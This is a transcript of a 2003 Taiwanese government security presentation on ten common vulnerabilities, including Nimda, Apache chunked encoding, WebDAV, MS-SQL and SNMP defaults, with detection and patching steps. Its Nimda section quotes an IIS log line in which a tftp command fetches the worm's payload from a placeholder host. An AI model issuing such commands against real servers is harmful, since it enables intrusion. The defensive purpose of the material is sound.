1 / 66

十大重要弱點 介紹與修復 行政院  國家資通安全會報 技術服務中心 林志堯 ICU, TCAE, CCSA  2003/12/05 技服中心網站 :icst.tw/

十大重要弱點 介紹與修復 行政院  國家資通安全會報 技術服務中心 林志堯 ICU, TCAE, CCSA  2003/12/05 技服中心網站 :http://www.icst.org.tw/. 大綱. 1. Nimda 弱點 2. Apache Chunked 弱點( Unix, Windows/Apache ) 3. IIS 5.0 WebDAV overflow 弱點 (MS03-007) ( Windows/IIS ) 4. 未設定安全密碼之微軟系統弱點( Windows ) 5. MS-SQL 預設帳號密碼之弱點( Windows )

kenny
Download Presentation

十大重要弱點 介紹與修復 行政院  國家資通安全會報 技術服務中心 林志堯 ICU, TCAE, CCSA  2003/12/05 技服中心網站 :icst.tw/

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. 十大重要弱點介紹與修復 行政院  國家資通安全會報 技術服務中心 林志堯 ICU, TCAE, CCSA  2003/12/05 技服中心網站:http://www.icst.org.tw/

  2. 大綱 1. Nimda 弱點 2. Apache Chunked 弱點(Unix, Windows/Apache) 3. IIS 5.0 WebDAV overflow 弱點(MS03-007) (Windows/IIS) 4. 未設定安全密碼之微軟系統弱點(Windows) 5. MS-SQL 預設帳號密碼之弱點(Windows) 6. FrontPage Server Extension (FPSE) 密碼偵測 (Windows/IIS)

  3. 大綱(續) 7. Microsoft RPC DCOM 弱點(MS03-039)(Windows) 8. SNMP 預設 Community Name 弱點(SNMP) 9. Sendmail Prescan() overflow 弱點(Unix, Windows) 10. Bind Overflow 弱點(Unix) 附註—Microsoft SUS service使用說明 結論

  4. 1.Nimda 弱點( Windows/IIS ) • 簡要說明: • Nimda病毒所使用的弱點可以讓攻擊者得以執行系統上的任意程式,而遭Nimda病毒感染的系統,則會繼續攻擊其它的網站,而Nimda病毒的感染方式有以下四種,分別為: • 收到包含病毒的Email而感染 • 瀏覽受害網頁而感染 • 開放資源共享而感染 • 有漏洞的IIS主機遭病毒入侵

  5. 1.Nimda 弱點( Windows/IIS )(續) • 當電腦有以下任一種情況時,便可能是受到Nimda感染。 • 根目錄下存在admin.dll,可能包含的路徑有C:\、D:\、…,檔案大小約為57K。 • 電腦中存有readme.eml (有少數受感染電腦中存有readme.wav或readme.com) 。 • 在C:\Windows\Temp目錄下存在檔案mepXXXX.tmp.exe (XXXX 為任意字元) • 電腦的系統目錄中有load.exe,且大小通常為57344 bytes。 • 電腦中的riched32.dll檔案大小為57344 bytes。 • 不預期的資源分享被開啟,比如將根目錄( C:\、D:\、E:\、…) 分享出來,而且不設權限。

  6. 1.Nimda 弱點( Windows/IIS )(續) • IIS Log中有如下的紀錄/c+tftp%20-i%20x.x.x.x%20GET%20Admin.dll %20D:Admin.dll 200 • 在wininit.ini中有mepXXXX.tmp.exe這個字串(XXXX為任意字元) • 在system.ini中出現一行:Shell = explorer.exe load.exe –ontrunold • 新增一個 guest 帳號,並且其權限為Administrator。 • 網頁 (通常是首頁) 有一個 JavaScript,通常藏在網頁的最下方,而各種形式的網頁檔案 (html、thm、htt、asp、shtml、shtm) 都有可能。

  7. 1.Nimda 弱點( Windows/IIS )(續) • 解決方法: • 執行Nimda病毒的清除程式 • 賽門鐵克為 fixnimda.com • http://securityresponse.symantec.com/avcenter/venc/data/w32.nimda.a@mm.removal.tool.html • 趨勢科技為 FIX_NIMDA4.0.COM • http://www.trend.com.tw/corporate/techsupport/cleanutil/index.htm • 將 C:\WINDOWS\SYSTEM.INI 檔案中的SHELL = explorer.exe load.exe –dontrunold 改成 SHELL = explorer.exe

  8. 1.Nimda 弱點( Windows/IIS )(續) • 移除不必要的資源分享,並對實際需要的資源分享設定嚴格的密碼,最好是將需分享的資源隱藏起來 (在分享目錄名稱最後加上$) • 將 administrator 群組中的 guest 帳號移除掉 (如果有的話) • 由於 Nimda會利用iis worm或是codered入侵所使用的漏洞進行蔓延,另外也會因為IE的漏洞讓瀏覽器感染,因此需要安裝以下兩個修補程式 • http://www.microsoft.com/technet/security/bulletin/MS01-020.asp • http://www.microsoft.com/technet/security/bulletin/MS01-44.asp

  9. 2.Apache Chunked 弱點(Unix, Windows/Apache) • 簡要說明 • Apache web server當收到以Chunked方式編碼的資料,因為無適當計算接收buffer大小的機制,以致發生buffer overflow或是race condition的情況,結果會造成攻擊者可以執行系統上任意程式的弱點。這個弱點發生在Apache 1.2.2及之後的版本,或是Apache 1.3到1.3.24的版本,或Apache 2.0到2.0.36的版本。 • 另針對這個問題攻擊的電腦病毒據傳也在網路上散佈。

  10. 2.Apache Chunked 弱點(Unix, Windows/Apache)(續) • 檢測方式 • 可自行下載Eeye Digital的Apache chunk弱點的偵測工具進行偵測,網址為: • http://www.eeye.com/html/Research/Tools/RetinaApacheChunked.exe • 使用Nessus掃描軟體掃描,網址為 • http://www.nessus.org/ • 檢查所用Apache的版本或驗證是否已安裝修補程式

  11. 2.Apache Chunked 弱點(Unix, Windows/Apache)(續) • 解決方法 • 升級的話請升級到Apache 1.3.26或之後的版本,或是Apache 2.0.39或之後的版本。下載網址為:http://www.apache.org • RedHat linux 請執行up2date指令進行預設安裝apache的弱點修補,或是至http://www.redhat.com/apps/support/errata/下載,下載完後以 rpm -Fvh *.rpm 安裝修正程式。

  12. 2.Apache Chunked 弱點(Unix, Windows/Apache)(續) • FreeBSD 請移除舊版的Apache,並從port裡更新Apache,port位址為:/usr/port/www/apache13/、/usr/port/www/apache13-modssl/,或/usr/port/www/apache2/。若是系統上有安裝portupgrade這個套件,也可以使用#portupgrade apache更新,或是使用 #portupgrade –a更新所有套件。 • 其他平台請依據參考資訊進行修補,網址為: • http://online.securityfocus.com/bid/5033/solution/ • http://www.kb.cert.org/vuls/id/944335

  13. 3.IIS 5.0 WebDAV overflow 弱點 (MS03-007) (Windows/IIS) • 簡要說明 • WebDAV為World Wide Web Distributed Authoring and Versioning的簡稱,作為HTTP協定的延伸。WebDAV協定作為web介面的編輯與檔案管理用途,在windows 2000上首次採用此協定。而問題出現在處理WebDAV request的Ntdll.dll對於傳來的request並未正確驗證,而導致緩衝區溢位以致於導致攻擊者得以利用系統上執行IIS service的權限(通常是系統上的LocalSystem權限)執行系統上的任意程式。風險程度相當高。 • 註:此問題僅出現在windows 2000主機上。

  14. 3.IIS 5.0 WebDAV overflow 弱點(MS03-007) (Windows/IIS)(續) • 檢測方法 • 檢查以下的register key是否存在(請在開始程式中選擇執行,並輸入regedit開始登錄編輯程式)。 • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP4\Q815021 • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Updates\Windows 2000\SP5 • 若存在代表系統上已安裝此修補程式—MS 03-007,若不存在則代表系統尚未安裝修補程式,並極可能存在弱點。

  15. 3.IIS 5.0 WebDAV overflow 弱點(MS03-007) (Windows/IIS)(續) • 解決方法 • 建議安裝修補程式,網址為http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en • 或直接安裝Service Pack 4 ,下載網址為: http://www.microsoft.com/windows2000/downloads/servicepacks/sp4/default.asp

  16. 3.IIS 5.0 WebDAV overflow 弱點(MS03-007) (Windows/IIS)(續) • 若是不需要WebDAV的支援,取消的方式為 • 執行registry key編輯 • 至以下登錄值HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters • 加入以下registry value: Value name: DisableWebDAVData type: DWORDValue data: 1 • 重新啟動IIS或是重新啟動server以使用新設定 • 參考資料: • http://www.microsoft.com/technet/treeview/?url=/technet/security/bulletin/MS03-007.asp • http://support.microsoft.com/default.aspx?scid=kb;en-us;815021

  17. 4.未設定安全密碼之微軟系統弱點(Windows) • 簡要說明 • Windows主機使用Server Message Block (SMB)協定,或稱為Common Internet File System (CIFS)的協定,使windows主機可以將另一Windows主機目錄檔案當成是本機上的目錄檔案使用,即所謂的網路芳鄰分享。而這個協定亦可以用於Internet網段,即位於不同網段的Windows主機也可使用此協定進行目錄檔案的分享(假如傳送過程中未有其他的網路設備阻擋時)或是遠端管理功能用途。

  18. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • 雖然SMB協定具有相當的便利性,但設定不夠完善的Windows主機(如密碼設定不夠安全或是未設定密碼)常讓外界使用者經此網路芳鄰分享,洩漏區域網路內相關檔案或系統上的機密資訊,甚至讓網路駭客完全控制該部主機。譬如2001年中的Nimda病毒就是經由網路芳鄰的方式散佈病毒至另一台保護不週(密碼設定不夠安全)的Windows主機上,以致造成感染病毒的速度加快。此外亦常見病毒在其中含有網芳密碼猜測的功能,以利其散播。

  19. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • 檢測方法 • 技服中心針對網芳密碼強度使用檢測工具進行檢測,檢測是否得以測到不安全的密碼,關於密碼設定的原則,密碼中應至少含有以下四種中的三種:(1)英文小寫字母、(2)英文大寫字母、(3)數字或(4)特殊字元:如!、$、*等,而長度則應為8個字元以上。並且避免選擇字典中可找到的簡單字之組合。

  20. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • 解決方法 • 阻擋非必要的網芳分享: • 特別是對於來自Internet的連線請求,建議與以阻擋。阻擋方式為使用防火牆設定僅有需要的ports才開放(如IIS所使用的port 80),而關閉網芳或Windows遠端管理所使用的ports(如port 135、137-139、445)。另不論是否關閉上述的ports,仍需設定安全之密碼。

  21. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • 密碼設定方式: • 建議將Windows系統上的帳號設定成符合密碼設定原則的密碼。 • NT 4:可直接同時按下Ctrl+Alt+Del,在其中可以輸入欲變更密碼之帳號,輸入舊密碼後即可輸入新密碼。或是從<開始><程式集><系統管理工具(公用)><網域使用者管理員><本機使用者與群組>,在其中選取使用者並設定新密碼即可。

  22. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • Windows 2000可直接同時按下Ctrl+Alt+Del,在其中可以輸入欲變更密碼之帳號,輸入舊密碼後即可輸入新密碼。或是從<開始><程式集><系統管理工具><電腦管理><本機使用者與群組>,在其中的使用者選取欲變更密碼之帳號,設定密碼即可。若是Windows 2000 professional版,則其<系統管理工具>位置與Windows 2000 server不同,請由<控制台>中選取。或者直接在<控制台>中選取<使用者與密碼>設定系統上帳號的密碼。 • 參考資訊 • http://www.sans.org/top20/#W7

  23. 4.未設定安全密碼之微軟系統弱點(Windows)(續) • 註:依據越簡單越容易管理的原則,請檢查系統上的是否存在有不必要的帳號,尤其是屬於Administrator群組的帳號。另若系統是屬於網域控制站(Domain Controller)的話,亦可使用其中的密碼設定原則,設定網域成員(Domain member)上的密碼複雜度。反之若系統是屬於網域成員(Domain member)的話,同樣可由網域控制站來設定其密碼複雜度。

  24. 5.MS-SQL 預設帳號密碼之弱點(Windows) • 簡要說明 • 不論是SQL 7或是SQL 2000在安裝的過程中,皆可能產生SQL上存在帳號為sa,密碼為空的情況(雖然安裝過程中系統會提醒將sa帳號設定密碼,但仍然可以不設密碼) • 在系統上安裝其他應用程式的情況下,也可能出現預設帳號密碼的情況,在攻擊者獲得SQL帳號密碼時,將可修改或刪除系統上資料庫資訊,另外由於MS-SQL預設支援執行系統上指令(像是執行系統上的MS-DOS模式,或是看系統上的register key等等)的功能,因此攻擊者在獲得MS-SQL的帳號密碼後,也可能有機會使用此功能。

  25. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 偵測方法 • 技服中心使用MS-SQL預設之帳號sa與空密碼,或是預設之帳號與密碼直接與MS-SQL進行連線測試。 • 解決方式 • 阻擋非必要的MS-SQL通訊埠的開放 • Port 1433(TCP) • 若是MS-SQL主機不需要遠端管理的話,建議以防火牆將來自Internet至此port的連線請求與以阻擋。 • Port 1434(UDP) • 防止如slammer worm之感染。

  26. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 設定sa帳號的密碼 • SQL 2000: • 開啟SQL的Enterprise Manager

  27. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 選擇其中的SQL Server Group

  28. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 選取欲變更密碼的資料庫,並選擇其中的security

  29. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 選取Logins,選取sa,並設定密碼。

  30. 5.MS-SQL 預設帳號密碼之弱點(Windows)(續) • 更新MS-SQL的修補程式參考以下網址進行MS-SQL的設定與修補程式的安裝。http://www.microsoft.com/sql/ • 參考資訊 • http://www.microsoft.com/sql/

  31. 6.FrontPage Server Extension (FPSE) 密碼偵測(Windows/IIS) • 簡要說明 • 針對FPSE設定不安全密碼的情況進行偵測,與之前針對FPSE的掃描不同,之前所偵測的僅有未設定權限的情況,而此弱點掃描中加入FPSE密碼設定不夠安全的偵測,期望大幅減少不安全的IIS伺服器(有FPSE支援)。 • 檢測方法 • 針對有FPSE支援之IIS伺服器,技服中心將使用帳號:Administrator及若干簡單密碼組合,進行系統登入測試,若得以順利登入。並具有足夠的權限進行網頁更換,則代表系統上的FPSE具有權限設定不夠安全的問題。

  32. 6.FrontPage Server Extension (FPSE)密碼偵測(Windows/IIS)(續) • 解決方法 • 關於解決此問題,可分為兩個方式: • 移除FPSE: • 關於移除的方式請參考網址:http://www.icst.org.tw/template/ncert/leakrepair.zip • 並請在移除後檢查系統是否仍有”_vti_bin”目錄存在(建議使用<開始><搜尋>找尋),若有則代表FPSE仍未移除,此時可再重新移除,或者將”_vti_bin”移掉,或是更換該目錄名稱,如將”_vti_bin”換成”_vti_bin_remove”或其他的名稱,亦可使得FPSE無法使用。

  33. 6.FrontPage Server Extension (FPSE) 密碼偵測(Windows/IIS)(續) • 設定FPSE使用目錄之”everyone”群組之權限,並設定系統使用者(尤其是Administrator帳號)的密碼: • 其中設定FPSE使用目錄之”everyone”群組之權限在防止FPSE允許任何人可以不輸入帳號密碼的情況即登入FPSE。關於”everyone”群組之權限建議設成僅有”讀取”、”執行”、”清單資料夾的內容”的權限,亦即僅給”everyone”群組有最小可接受的權限。(設定細項參考第4個弱點) • 設定系統使用者的密碼則是防止使用者設定不安全的密碼,導致FPSE雖然要求使用者輸入密碼,但是使用者仍然輸入空密碼或是簡單的密碼即可登入。因此需要對系統使用者設定安全的密碼,防止網頁內容遭竄改。 • 參考資訊 • http://www.icst.org.tw/template/ncert/leakrepair.zip

  34. 7.Microsoft RPC DCOM 弱點(MS03-039)(Windows) • 簡要說明 • 微軟針對RPC弱點於7月釋出修補程式MS03-026,著名的MSBlast(疾風)即利用此弱點進行傳播 • 然而微軟於MS03-026 中針對其RPC弱點的修補程式並不完整,因此又釋出MS03-039修補程式。Windows NT/2000/XP/2003 均受此弱點影響,需安裝此修補程式。

  35. 7.Microsoft RPC DCOM 弱點(MS03-039)(Windows)(續) • 檢測方法 • 可於本機上執行新增移除程式,檢查是否安裝了 Hotfix KB824146 (Q824146);亦可下載微軟所提供的掃描程式透過網路進行掃描 • http://www.microsoft.com/downloads/details.aspx?displaylang=zh-tw&FamilyID=13AE421B-7BAB-41A2-843B-FAD838FE472E • 安裝完後會將掃描程式放置於 %ProgramFiles%\KB824146Scan 資料夾下,執行KB824146Scan.exe host 即可掃描單一主機,執行KB824146Scan.exe network_address/cidr_mask 即可掃描整個子網路,如欲掃瞄 192.168.0.0 整個子網路,可執行 KB824146Scan.exe 192.168.0.0/24。

  36. 7.Microsoft RPC DCOM 弱點(MS03-039)(Windows)(續) • 解決方法 • 安裝微軟所提供 MS03-039 修補程式http://www.microsoft.com/taiwan/security/bulletins/MS03-039.asp • 建議於防火牆擋掉外部網路對內部 TCP/UDP Port 135 的存取,亦建議擋掉UDP Port 137/138/445 與 TCP Port 139/445/593。 • 參考資訊 • http://www.microsoft.com/taiwan/security/bulletins/MS03-039.asp • http://www.cert.org/advisories/CA-2003-23.html

  37. 8.SNMP 預設 Community Name 弱點(SNMP) • 簡要說明 • SNMP ( Simple Network Management Protocol ) 被廣泛使用來做遠端管理與監控網路設備,如設定網路組態與監控流量等。 • SNMP使用Community Name為其認證機制,通常又分為唯讀與可寫入兩種權限,各設備通常會有預設的Community Name,如以public當成唯讀的Community Name,以private當成可寫入的Community Name。 • 攻擊者如果知道唯讀的Community Name,則可藉此獲取所需資訊;攻擊者如果知道可寫入的Community Name,則可藉此竄改網路設備的設定。此外約於91年2月左右,多個SNMP的實作亦被發現含有DoS弱點。

  38. 8.SNMP 預設 Community Name 弱點(SNMP)(續) • 檢測方法 • 技服中心將利用Nessus,使用幾組常用的Community Names作測試,檢測是否可透過SNMP存取網路設備。 • 解決方法 • 如果不需使用SNMP,建議將其關閉。如果需要使用到SNMP,請設定一組較複雜之Community Name,並設定防火牆或路由器阻擋SNMP所使用之TCP Prot 161及UDP Port 161/162。

  39. 8.SNMP 預設 Community Name 弱點(SNMP)(續) • 以 Cisco IOS 為例,若欲關閉 SNMP,則執行no snmp-server • 若欲取消某一SNMP Community,則執no snmp-server community string • 例如欲取消 public這一個Community,則執行no snmp-server community public • 若欲設定為某一SNMP Community,則執行snmp-server community string ro|rw • 例如欲設定 strong_community 有可寫入權限,則執行snmp-server community strong_community rw

  40. 8.SNMP 預設 Community Name 弱點(SNMP)(續) • Windows 系統不需使用SNMP者,請於服務中停用 Simple Network Management Protocol,或直接透過新增移除程式將其移除。 • RedHat Linux 請執行下列指令關閉 snmp:service snmpd stopchkconfig snmpd off • 其他設備SNMP設定方法請尋求設備廠商協助

  41. 8.SNMP 預設 Community Name 弱點(SNMP)(續) • 參考資訊 • http://www.sans.org/top20/#w10 • http://www.sans.org/top20/#u7 • http://www.cisco.com/univercd/cc/td/doc/product/software/ios123/123cgcr/fun_r/cfr_1g10.htm#1034652 • http://www.cert.org/advisories/CA-2002-03.html

  42. 9.Sendmail Prescan() overflow 弱點(Unix, Windows) • 簡要說明 • Sendmail為著名的MTA軟體,而在今年9月中出現一個新的緩衝區溢位,原因在於其中的prescan()函數對於攻擊者送來的特殊郵件內容處理不當,結果使得攻擊者得以sendmail daemon的權限執行系統上的任意程式,而此權限有可能是root權限。此弱點存在於sendmail 8.12.10版之前(包含5.79到8.12.9),另外商業版的sendmail軟體同樣有此弱點,包含有Sendmail Switch, Sendmail Advanced Message Server (SAMS), and Sendmail for NT。 • 由於此弱點是經由特殊內容的郵件內容來攻擊,而非較低層的網路封包,因此未含有此弱點的sendmail程式或是其他的MTA軟體(如Exchange),依然會轉寄有問題的郵件給其他的sendmail,結果將造成更大的危害。

  43. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • 檢測方法 • SolarisSolaris 7、8、9皆有此弱點存在,檢測的方式可以經由/usr/bin/mconnect指令,觀察回應訊息 • 對於Solaris 7與8而言,若出現的資訊為8.11.7+Sun代表系統上的sendmail存在有弱點,若是回應的資訊為8.11.7p1+Sun,代表系統已安裝修補程式 • 若對於Solaris 9而言,回應的資訊若為8.12.9+Sun,代表系統上的sendmail存在有弱點,8.12.10+Sun代表系統已安裝修補程式。

  44. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • RedHat Linux目前仍有支援的RedHat Linux系統版本為7.1、7.2、7.3、8.0與9版(較舊的版本已不再支援,請更新到上述的版本),對於上述版本是否有安裝此弱點的修補程式,請執行rpm –q sendmail指令,若出現的資訊為: • 7.1版 sendmail-8.11.6-27.71 • 7.2版 sendmail-8.11.6-27.72 • 7.3版 sendmail-8.11.6-27.73 • 8.0版 sendmail-8.12.8-9.80 • 9版 sendmail-8.12.8-9.90 代表已安裝修補程式

  45. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • 若出現的值中的release號碼(如上述中的sendmail-8.11.6-x.ZZ與sendmail-8.12.8-y.ZZ中的x與y數字,如此處的x=27, y=9)是比本文所列的還少的話,代表系統存在此弱點,若相等的話,代表系統已安裝此最新修補程式,若出現的數字較大的話,則代表系統上安裝了比此弱點更新的修補程式(此情況將出現在未來有出現同樣為sendmail弱點的情形下,且安裝了新修補程式,故在目前是不可能發生的)。

  46. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • FreeBSD目前仍有支援的版本為4.7、4.8、4.9、5.0與5.1版,4-stable版,舊版本更新的方式請參考 • http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/cutting-edge.html • 檢查是否存在有弱點,請使用# pkg_info | grep sendmail • 若是有出現sendmail的資訊,且高於或等於8.12.10者,代表系統上的sendmail是無弱點的 • 若上述的結果並未發現有sendmail的資訊,則檢查檔案:/usr/libexec/sendmail/sendmail的日期,若是該檔的日期是比2003年9月17日還新,代表系統可能無此弱點。

  47. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • 解決方法 • Solaris • 參考網站:http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert/56860所列的修補方式,在其中選擇所用的硬體架構(如SPARC或x386)與版本,連結至新網頁後,下載修補程式後,使用patchadd指令安裝修補程式,方式為patchadd < /var/spool/patch/patch_file,其中/var/spool/patch代表放置修補程式的目錄,patch_file代表修補程式檔名,如110615。

  48. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • 註:由於系統安裝上的程式具有相依性,因此在安裝上述的修補程式時,須注意是否有安裝該修補程式的相依修補程式(在各個修補程式網頁中,皆會說明所需要的修補程式為何),因此,若是對於有許多的弱點皆需修補的系統而言,建議採用一次同時安裝多個修補程式的方式進行,此方式為安裝Solaris的Recommend.zip修補程式,Recommend.zip包含有該系統中所有(含最新)的修補程式,網址為:http://sunsolve.sun.com/pub-cgi/show.pl,使用方式請參考該網站的說明。

  49. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • RedHat Linux • 請至https://rhn.redhat.com/errata/RHSA-2003-283.html網站上下載sendmail的修補程式,如以一般常見的x386電腦架構而言,請將個別版本中屬於i386的四個檔案下載至本機上(建議建一目錄專門放置新的rpm檔,如建立/var/rpm目錄),下載後進入此目錄,執行rpm –Fvh *.rpm • 若是要對整個系統上的弱點進行修補的話,建議使用up2date工具,詳細使用方式請參考相關說明文件,或是參考技服中心網站(http://www.icst.org.tw)上的RedHat linux的修補程式安裝說明。

  50. 9.Sendmail Prescan() overflow 弱點(Unix, Windows)(續) • FreeBSD • 系統上的sendmail daemon,可能是經由系統設定而啟動(安裝系統時皆已含有sendmail的程式,只是不一定有設定為啟動),或是經由ports安裝的(位置在/usr/port/mail/sendmail)。 • Sendmail為隨系統一併安裝的情況:系統上需要有系統的source code才可進行修補,同樣地,若是僅安裝單一修補程式的情況,可直接使用patch指令,方式為下載修補程式後,執行以下:

More Related